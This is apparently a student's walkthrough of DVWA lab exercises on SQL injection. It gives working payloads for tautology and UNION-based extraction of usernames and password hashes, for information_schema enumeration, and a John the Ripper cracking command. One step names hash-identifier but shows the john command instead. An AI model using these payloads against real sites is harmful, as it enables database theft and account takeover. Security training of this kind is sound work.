# DVWA Exercises 5
### 09 SQL Injection
Here we can see an input field where we can put in a number. The sql statement in the background could look like this:
`select firstname,surname from users where uid='$_GET['id']';`
Let's try to inject a SQL statement:
`1' or '1' = '1`
### 10 SQL Injection with union
With SQL Union we can grab information from other tables.
The `UNION` keyword lets you execute one or more additional `SELECT` queries and append the results to the original query. For example:
```
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
```
This SQL query will return a single result set with two columns, containing values from columns `a` and `b` in `table1` and columns `c` and `d` in `table2`.
For a `UNION` query to work, two key requirements must be met:
* The individual queries must return the same number of columns.
* The data types in each column must be compatible between the individual queries.
Let's try the following SQL Query:
```
%' or '0'='0' union select user,password from users #
```
### 11 Further Database Enumeration
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query `information_schema.tables` to list the tables in the database:
```
SELECT * FROM information_schema.tables
```
You can then query `information_schema.columns` to list the columns in individual tables:
```
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
```
Let's try the following SQL Query:
```
%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #
```
### 12 Crack the password hashes
I put the collected password hashes in a file and try to crack the passwords with John the ripper.
First let's check which hash type we have with a tool called `hash-identifier:`
```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt
```
